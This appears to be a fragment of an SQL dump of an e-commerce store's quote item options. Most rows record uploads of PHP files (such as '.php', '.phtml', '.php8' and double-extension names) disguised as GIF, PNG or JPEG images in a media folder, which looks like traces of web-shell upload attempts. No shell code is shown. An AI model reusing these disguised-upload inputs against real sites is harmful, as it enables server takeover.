(372, 360, 2054, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/jpeg\",\"title\":\"imsyqo.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/i\\/m\\/imsyqo.php\",\"quote_path\":\"custom_options\\/quote\\/i\\/m\\/imsyqo.php\",\"order_path\":\"custom_options\\/quote\\/i\\/m\\/imsyqo.php\",\"size\":999,\"width\":257,\"height\":1,\"secret_key\":\"d71951d585c3a373c335\"}},\"qty\":1}'),
(373, 361, 2054, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/jpeg\",\"title\":\"avsyqo.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/a\\/v\\/avsyqo.php\",\"quote_path\":\"custom_options\\/quote\\/a\\/v\\/avsyqo.php\",\"order_path\":\"custom_options\\/quote\\/a\\/v\\/avsyqo.php\",\"size\":999,\"width\":257,\"height\":1,\"secret_key\":\"d71951d585c3a373c335\"}},\"qty\":1}'),
(374, 362, 2054, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/jpeg\",\"title\":\"avsyqo.php8\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/a\\/v\\/avsyqo.php8\",\"quote_path\":\"custom_options\\/quote\\/a\\/v\\/avsyqo.php8\",\"order_path\":\"custom_options\\/quote\\/a\\/v\\/avsyqo.php8\",\"size\":999,\"width\":257,\"height\":1,\"secret_key\":\"d71951d585c3a373c335\"}},\"qty\":1}'),
(375, 363, 2054, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/jpeg\",\"title\":\"avsyqo.phtml\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/a\\/v\\/avsyqo.phtml\",\"quote_path\":\"custom_options\\/quote\\/a\\/v\\/avsyqo.phtml\",\"order_path\":\"custom_options\\/quote\\/a\\/v\\/avsyqo.phtml\",\"size\":999,\"width\":257,\"height\":1,\"secret_key\":\"d71951d585c3a373c335\"}},\"qty\":1}'),
(376, 364, 2054, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/jpeg\",\"title\":\"avsyqo.inc\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/a\\/v\\/avsyqo.inc\",\"quote_path\":\"custom_options\\/quote\\/a\\/v\\/avsyqo.inc\",\"order_path\":\"custom_options\\/quote\\/a\\/v\\/avsyqo.inc\",\"size\":999,\"width\":257,\"height\":1,\"secret_key\":\"d71951d585c3a373c335\"}},\"qty\":1}'),
(377, 365, 2062, 'info_buyRequest', '{\"options\":{\"779\":{\"type\":\"image\\/gif\",\"title\":\"779index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/7\\/7\\/779index.php\",\"quote_path\":\"custom_options\\/quote\\/7\\/7\\/779index.php\",\"order_path\":\"custom_options\\/quote\\/7\\/7\\/779index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(378, 366, 2062, 'info_buyRequest', '{\"options\":{\"254\":{\"type\":\"image\\/gif\",\"title\":\"254index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/2\\/5\\/254index.php\",\"quote_path\":\"custom_options\\/quote\\/2\\/5\\/254index.php\",\"order_path\":\"custom_options\\/quote\\/2\\/5\\/254index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(379, 367, 2062, 'info_buyRequest', '{\"options\":{\"641\":{\"type\":\"image\\/gif\",\"title\":\"641index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/6\\/4\\/641index.php\",\"quote_path\":\"custom_options\\/quote\\/6\\/4\\/641index.php\",\"order_path\":\"custom_options\\/quote\\/6\\/4\\/641index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(380, 368, 2062, 'info_buyRequest', '{\"options\":{\"526\":{\"type\":\"image\\/gif\",\"title\":\"526index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/2\\/526index.php\",\"quote_path\":\"custom_options\\/quote\\/5\\/2\\/526index.php\",\"order_path\":\"custom_options\\/quote\\/5\\/2\\/526index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(381, 369, 2054, 'info_buyRequest', '{\"options\":{\"12345\":{\"type\":\"image\\/gif\",\"title\":\"50_94396.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/0\\/50_94396_1.php\",\"quote_path\":\"custom_options\\/quote\\/5\\/0\\/50_94396_1.php\",\"order_path\":\"custom_options\\/quote\\/5\\/0\\/50_94396_1.php\",\"size\":276,\"width\":16188,\"height\":26736,\"secret_key\":\"6e4dc06882d07f2c0634\"}},\"qty\":1}'),
(382, 370, 2062, 'info_buyRequest', '{\"options\":{\"716\":{\"type\":\"image\\/gif\",\"title\":\"716index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/7\\/1\\/716index.php\",\"quote_path\":\"custom_options\\/quote\\/7\\/1\\/716index.php\",\"order_path\":\"custom_options\\/quote\\/7\\/1\\/716index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(383, 371, 2059, 'info_buyRequest', '{\"options\":{\"1\":{\"type\":\"image\\/png\",\"title\":\"ut48zm4d.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/u\\/t\\/ut48zm4d.php\",\"quote_path\":\"custom_options\\/quote\\/u\\/t\\/ut48zm4d.php\",\"order_path\":\"custom_options\\/quote\\/u\\/t\\/ut48zm4d.php\",\"size\":1159,\"width\":1,\"height\":1,\"secret_key\":\"2b8f02e6ad095024adcc\"}},\"qty\":1}'),
(384, 372, 2054, 'info_buyRequest', '{\"options\":{\"1\":{\"type\":\"image\\/png\",\"title\":\"ut48zm4d.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/u\\/t\\/ut48zm4d_1.php\",\"quote_path\":\"custom_options\\/quote\\/u\\/t\\/ut48zm4d_1.php\",\"order_path\":\"custom_options\\/quote\\/u\\/t\\/ut48zm4d_1.php\",\"size\":1159,\"width\":1,\"height\":1,\"secret_key\":\"2b8f02e6ad095024adcc\"}},\"qty\":1}'),
(385, 373, 2062, 'info_buyRequest', '{\"options\":{\"901\":{\"type\":\"image\\/gif\",\"title\":\"901index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/9\\/0\\/901index.php\",\"quote_path\":\"custom_options\\/quote\\/9\\/0\\/901index.php\",\"order_path\":\"custom_options\\/quote\\/9\\/0\\/901index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(386, 374, 2062, 'info_buyRequest', '{\"options\":{\"621\":{\"type\":\"image\\/gif\",\"title\":\"621index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/6\\/2\\/621index_1.php\",\"quote_path\":\"custom_options\\/quote\\/6\\/2\\/621index_1.php\",\"order_path\":\"custom_options\\/quote\\/6\\/2\\/621index_1.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(387, 375, 2062, 'info_buyRequest', '{\"options\":{\"207\":{\"type\":\"image\\/gif\",\"title\":\"207index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/2\\/0\\/207index.php\",\"quote_path\":\"custom_options\\/quote\\/2\\/0\\/207index.php\",\"order_path\":\"custom_options\\/quote\\/2\\/0\\/207index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(388, 376, 2062, 'info_buyRequest', '{\"options\":{\"125\":{\"type\":\"image\\/gif\",\"title\":\"125index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/1\\/2\\/125index.php\",\"quote_path\":\"custom_options\\/quote\\/1\\/2\\/125index.php\",\"order_path\":\"custom_options\\/quote\\/1\\/2\\/125index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(389, 377, 2054, 'info_buyRequest', '{\"options\":{\"12345\":{\"type\":\"image\\/gif\",\"title\":\"Kl_76312.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/K\\/l\\/Kl_76312_1.php\",\"quote_path\":\"custom_options\\/quote\\/K\\/l\\/Kl_76312_1.php\",\"order_path\":\"custom_options\\/quote\\/K\\/l\\/Kl_76312_1.php\",\"size\":276,\"width\":16188,\"height\":26736,\"secret_key\":\"6e4dc06882d07f2c0634\"}},\"qty\":1}'),
(390, 378, 2062, 'info_buyRequest', '{\"options\":{\"308\":{\"type\":\"image\\/gif\",\"title\":\"308index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/3\\/0\\/308index.php\",\"quote_path\":\"custom_options\\/quote\\/3\\/0\\/308index.php\",\"order_path\":\"custom_options\\/quote\\/3\\/0\\/308index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(391, 379, 2062, 'info_buyRequest', '{\"options\":{\"843\":{\"type\":\"image\\/gif\",\"title\":\"843index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/8\\/4\\/843index.php\",\"quote_path\":\"custom_options\\/quote\\/8\\/4\\/843index.php\",\"order_path\":\"custom_options\\/quote\\/8\\/4\\/843index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(392, 380, 2062, 'info_buyRequest', '{\"options\":{\"612\":{\"type\":\"image\\/gif\",\"title\":\"612index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/6\\/1\\/612index.php\",\"quote_path\":\"custom_options\\/quote\\/6\\/1\\/612index.php\",\"order_path\":\"custom_options\\/quote\\/6\\/1\\/612index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(393, 381, 2062, 'info_buyRequest', '{\"options\":{\"881\":{\"type\":\"image\\/gif\",\"title\":\"881index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/8\\/8\\/881index.php\",\"quote_path\":\"custom_options\\/quote\\/8\\/8\\/881index.php\",\"order_path\":\"custom_options\\/quote\\/8\\/8\\/881index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(394, 382, 2062, 'info_buyRequest', '{\"options\":{\"615\":{\"type\":\"image\\/gif\",\"title\":\"615index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/6\\/1\\/615index_1.php\",\"quote_path\":\"custom_options\\/quote\\/6\\/1\\/615index_1.php\",\"order_path\":\"custom_options\\/quote\\/6\\/1\\/615index_1.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(395, 383, 2062, 'info_buyRequest', '{\"options\":{\"404\":{\"type\":\"image\\/gif\",\"title\":\"404index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/4\\/0\\/404index.php\",\"quote_path\":\"custom_options\\/quote\\/4\\/0\\/404index.php\",\"order_path\":\"custom_options\\/quote\\/4\\/0\\/404index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(396, 384, 2062, 'info_buyRequest', '{\"options\":{\"915\":{\"type\":\"image\\/gif\",\"title\":\"915index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/9\\/1\\/915index.php\",\"quote_path\":\"custom_options\\/quote\\/9\\/1\\/915index.php\",\"order_path\":\"custom_options\\/quote\\/9\\/1\\/915index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(397, 385, 2062, 'info_buyRequest', '{\"options\":{\"627\":{\"type\":\"image\\/gif\",\"title\":\"627index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/6\\/2\\/627index.php\",\"quote_path\":\"custom_options\\/quote\\/6\\/2\\/627index.php\",\"order_path\":\"custom_options\\/quote\\/6\\/2\\/627index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(398, 386, 2062, 'info_buyRequest', '{\"options\":{\"299\":{\"type\":\"image\\/gif\",\"title\":\"299index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/2\\/9\\/299index.php\",\"quote_path\":\"custom_options\\/quote\\/2\\/9\\/299index.php\",\"order_path\":\"custom_options\\/quote\\/2\\/9\\/299index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(399, 387, 2062, 'info_buyRequest', '{\"options\":{\"335\":{\"type\":\"image\\/gif\",\"title\":\"335index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/3\\/3\\/335index.php\",\"quote_path\":\"custom_options\\/quote\\/3\\/3\\/335index.php\",\"order_path\":\"custom_options\\/quote\\/3\\/3\\/335index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(400, 388, 2062, 'info_buyRequest', '{\"options\":{\"982\":{\"type\":\"image\\/gif\",\"title\":\"982index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/9\\/8\\/982index.php\",\"quote_path\":\"custom_options\\/quote\\/9\\/8\\/982index.php\",\"order_path\":\"custom_options\\/quote\\/9\\/8\\/982index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(401, 389, 2062, 'info_buyRequest', '{\"options\":{\"985\":{\"type\":\"image\\/gif\",\"title\":\"985index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/9\\/8\\/985index.php\",\"quote_path\":\"custom_options\\/quote\\/9\\/8\\/985index.php\",\"order_path\":\"custom_options\\/quote\\/9\\/8\\/985index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(402, 390, 2062, 'info_buyRequest', '{\"options\":{\"314\":{\"type\":\"image\\/gif\",\"title\":\"314index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/3\\/1\\/314index.php\",\"quote_path\":\"custom_options\\/quote\\/3\\/1\\/314index.php\",\"order_path\":\"custom_options\\/quote\\/3\\/1\\/314index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(403, 391, 2062, 'info_buyRequest', '{\"options\":{\"806\":{\"type\":\"image\\/gif\",\"title\":\"806index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/8\\/0\\/806index.php\",\"quote_path\":\"custom_options\\/quote\\/8\\/0\\/806index.php\",\"order_path\":\"custom_options\\/quote\\/8\\/0\\/806index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(404, 392, 2062, 'info_buyRequest', '{\"options\":{\"676\":{\"type\":\"image\\/gif\",\"title\":\"676index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/6\\/7\\/676index_1.php\",\"quote_path\":\"custom_options\\/quote\\/6\\/7\\/676index_1.php\",\"order_path\":\"custom_options\\/quote\\/6\\/7\\/676index_1.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(405, 393, 2062, 'info_buyRequest', '{\"options\":{\"148\":{\"type\":\"image\\/gif\",\"title\":\"148index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/1\\/4\\/148index.php\",\"quote_path\":\"custom_options\\/quote\\/1\\/4\\/148index.php\",\"order_path\":\"custom_options\\/quote\\/1\\/4\\/148index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(406, 394, 2059, 'info_buyRequest', '{\"options\":{\"1\":{\"type\":\"image\\/png\",\"title\":\"cgar5w0w.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/c\\/g\\/cgar5w0w.php\",\"quote_path\":\"custom_options\\/quote\\/c\\/g\\/cgar5w0w.php\",\"order_path\":\"custom_options\\/quote\\/c\\/g\\/cgar5w0w.php\",\"size\":1159,\"width\":1,\"height\":1,\"secret_key\":\"2b8f02e6ad095024adcc\"}},\"qty\":1}'),
(407, 395, 2062, 'info_buyRequest', '{\"options\":{\"554\":{\"type\":\"image\\/gif\",\"title\":\"554index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/5\\/554index.php\",\"quote_path\":\"custom_options\\/quote\\/5\\/5\\/554index.php\",\"order_path\":\"custom_options\\/quote\\/5\\/5\\/554index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(408, 396, 2062, 'info_buyRequest', '{\"options\":{\"358\":{\"type\":\"image\\/gif\",\"title\":\"358index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/3\\/5\\/358index_1.php\",\"quote_path\":\"custom_options\\/quote\\/3\\/5\\/358index_1.php\",\"order_path\":\"custom_options\\/quote\\/3\\/5\\/358index_1.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(409, 397, 2062, 'info_buyRequest', '{\"options\":{\"110\":{\"type\":\"image\\/gif\",\"title\":\"110index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/1\\/1\\/110index.php\",\"quote_path\":\"custom_options\\/quote\\/1\\/1\\/110index.php\",\"order_path\":\"custom_options\\/quote\\/1\\/1\\/110index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(410, 398, 2059, 'info_buyRequest', '{\"options\":{\"1\":{\"type\":\"image\\/png\",\"title\":\"0k4yqjgf.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/0\\/k\\/0k4yqjgf.php\",\"quote_path\":\"custom_options\\/quote\\/0\\/k\\/0k4yqjgf.php\",\"order_path\":\"custom_options\\/quote\\/0\\/k\\/0k4yqjgf.php\",\"size\":1159,\"width\":1,\"height\":1,\"secret_key\":\"2b8f02e6ad095024adcc\"}},\"qty\":1}'),
(411, 399, 2062, 'info_buyRequest', '{\"options\":{\"651\":{\"type\":\"image\\/gif\",\"title\":\"651index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/6\\/5\\/651index_1.php\",\"quote_path\":\"custom_options\\/quote\\/6\\/5\\/651index_1.php\",\"order_path\":\"custom_options\\/quote\\/6\\/5\\/651index_1.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(412, 400, 2059, 'info_buyRequest', '{\"options\":{\"1\":{\"type\":\"image\\/png\",\"title\":\"0p0v2wc5.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/0\\/p\\/0p0v2wc5.php\",\"quote_path\":\"custom_options\\/quote\\/0\\/p\\/0p0v2wc5.php\",\"order_path\":\"custom_options\\/quote\\/0\\/p\\/0p0v2wc5.php\",\"size\":1159,\"width\":1,\"height\":1,\"secret_key\":\"2b8f02e6ad095024adcc\"}},\"qty\":1}'),
(413, 401, 2062, 'info_buyRequest', '{\"options\":{\"815\":{\"type\":\"image\\/gif\",\"title\":\"815index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/8\\/1\\/815index.php\",\"quote_path\":\"custom_options\\/quote\\/8\\/1\\/815index.php\",\"order_path\":\"custom_options\\/quote\\/8\\/1\\/815index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(414, 402, 2059, 'info_buyRequest', '{\"options\":{\"1\":{\"type\":\"image\\/png\",\"title\":\"mvw60ti5.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/m\\/v\\/mvw60ti5.php\",\"quote_path\":\"custom_options\\/quote\\/m\\/v\\/mvw60ti5.php\",\"order_path\":\"custom_options\\/quote\\/m\\/v\\/mvw60ti5.php\",\"size\":1159,\"width\":1,\"height\":1,\"secret_key\":\"2b8f02e6ad095024adcc\"}},\"qty\":1}'),
(415, 403, 2059, 'info_buyRequest', '{\"options\":{\"1\":{\"type\":\"image\\/png\",\"title\":\"jaumk8ng.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/j\\/a\\/jaumk8ng.php\",\"quote_path\":\"custom_options\\/quote\\/j\\/a\\/jaumk8ng.php\",\"order_path\":\"custom_options\\/quote\\/j\\/a\\/jaumk8ng.php\",\"size\":1159,\"width\":1,\"height\":1,\"secret_key\":\"2b8f02e6ad095024adcc\"}},\"qty\":1}'),
(416, 404, 2062, 'info_buyRequest', '{\"options\":{\"725\":{\"type\":\"image\\/gif\",\"title\":\"725index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/7\\/2\\/725index.php\",\"quote_path\":\"custom_options\\/quote\\/7\\/2\\/725index.php\",\"order_path\":\"custom_options\\/quote\\/7\\/2\\/725index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(417, 405, 2062, 'info_buyRequest', '{\"options\":{\"469\":{\"type\":\"image\\/gif\",\"title\":\"469index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/4\\/6\\/469index.php\",\"quote_path\":\"custom_options\\/quote\\/4\\/6\\/469index.php\",\"order_path\":\"custom_options\\/quote\\/4\\/6\\/469index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(418, 406, 2059, 'info_buyRequest', '{\"options\":{\"1\":{\"type\":\"image\\/png\",\"title\":\"5dzsebut.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/d\\/5dzsebut.php\",\"quote_path\":\"custom_options\\/quote\\/5\\/d\\/5dzsebut.php\",\"order_path\":\"custom_options\\/quote\\/5\\/d\\/5dzsebut.php\",\"size\":1159,\"width\":1,\"height\":1,\"secret_key\":\"2b8f02e6ad095024adcc\"}},\"qty\":1}'),
(419, 407, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tLw,,\",\"product\":\"2061\",\"qty\":\"1\"}'),
(420, 408, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tL2NhdGFsb2cvcHJvZHVjdC92aWV3L2lkLzIwNjEv\",\"product\":\"2061\",\"item\":\"2061\",\"qty\":\"1\",\"related_product\":\"\",\"selected_configurable_option\":\"\"}'),
(421, 409, 2059, 'info_buyRequest', '{\"options\":{\"1\":{\"type\":\"image\\/png\",\"title\":\"kzsg1jbs.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/k\\/z\\/kzsg1jbs.php\",\"quote_path\":\"custom_options\\/quote\\/k\\/z\\/kzsg1jbs.php\",\"order_path\":\"custom_options\\/quote\\/k\\/z\\/kzsg1jbs.php\",\"size\":1159,\"width\":1,\"height\":1,\"secret_key\":\"2b8f02e6ad095024adcc\"}},\"qty\":1}'),
(422, 410, 2054, 'info_buyRequest', '{\"options\":{\"12345\":{\"type\":\"image\\/png\",\"title\":\"1342index.php.\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/1\\/3\\/1342index.php._1.png\",\"quote_path\":\"custom_options\\/quote\\/1\\/3\\/1342index.php._1.png\",\"order_path\":\"custom_options\\/quote\\/1\\/3\\/1342index.php._1.png\",\"size\":146,\"width\":1,\"height\":1,\"secret_key\":\"181d16c4d40d86a23842\"}},\"qty\":1}'),
(423, 411, 2054, 'info_buyRequest', '{\"options\":{\"12345\":{\"type\":\"image\\/png\",\"title\":\"1342index.php.gif\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/1\\/3\\/1342index.php_1.gif\",\"quote_path\":\"custom_options\\/quote\\/1\\/3\\/1342index.php_1.gif\",\"order_path\":\"custom_options\\/quote\\/1\\/3\\/1342index.php_1.gif\",\"size\":146,\"width\":1,\"height\":1,\"secret_key\":\"181d16c4d40d86a23842\"}},\"qty\":1}'),
(424, 412, 2062, 'info_buyRequest', '{\"options\":{\"753\":{\"type\":\"image\\/gif\",\"title\":\"753index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/7\\/5\\/753index.php\",\"quote_path\":\"custom_options\\/quote\\/7\\/5\\/753index.php\",\"order_path\":\"custom_options\\/quote\\/7\\/5\\/753index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(425, 413, 2062, 'info_buyRequest', '{\"options\":{\"230\":{\"type\":\"image\\/gif\",\"title\":\"230index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/2\\/3\\/230index.php\",\"quote_path\":\"custom_options\\/quote\\/2\\/3\\/230index.php\",\"order_path\":\"custom_options\\/quote\\/2\\/3\\/230index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
